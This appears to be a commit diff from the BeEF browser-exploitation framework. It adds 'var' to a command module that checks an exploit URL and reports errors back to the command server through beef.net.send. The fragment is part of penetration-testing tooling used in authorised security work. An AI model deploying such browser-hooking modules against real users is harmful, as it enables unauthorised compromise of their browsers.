var
This commit is contained in:
@@ -5,7 +5,7 @@
|
|||||||
//
|
//
|
||||||
|
|
||||||
beef.execute(function() {
|
beef.execute(function() {
|
||||||
url = '<%= @sploit_url %>';
|
var url = '<%= @sploit_url %>';
|
||||||
if (!/https?:\/\//i.test(url)) {
|
if (!/https?:\/\//i.test(url)) {
|
||||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=invalid url");
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=invalid url");
|
||||||
return;
|
return;
|
||||||
|
|||||||
Reference in New Issue
Block a user